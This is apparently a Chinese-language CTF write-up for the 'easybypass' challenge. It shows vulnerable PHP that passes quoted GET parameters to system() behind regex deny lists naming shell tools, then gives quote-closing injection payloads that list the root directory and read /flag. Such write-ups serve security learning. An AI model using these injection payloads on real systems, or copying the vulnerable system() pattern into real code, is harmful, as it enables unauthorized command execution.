# easybypass

源码:

 <?php
 
highlight_file(__FILE__);
 
$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];
 
 
if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $comm2 = "";
 
$flag = "#flag in /flag";
 
$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
 
$cmd = "file $comm1 $comm2";
system($cmd);
?>
cannot open `' (No such file or directory) cannot open `' (No such file or directory) 

可以看到这里很清楚了,也就是在我们传的参数两边套上了双引号然后,拼接到 cmd 的后面这时考虑到引号闭合就好了直接上 payload

?comm1=index.php";dir /;"&comm2
?comm1=index.php";tac /f*;"&comm2

直接出 flag

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal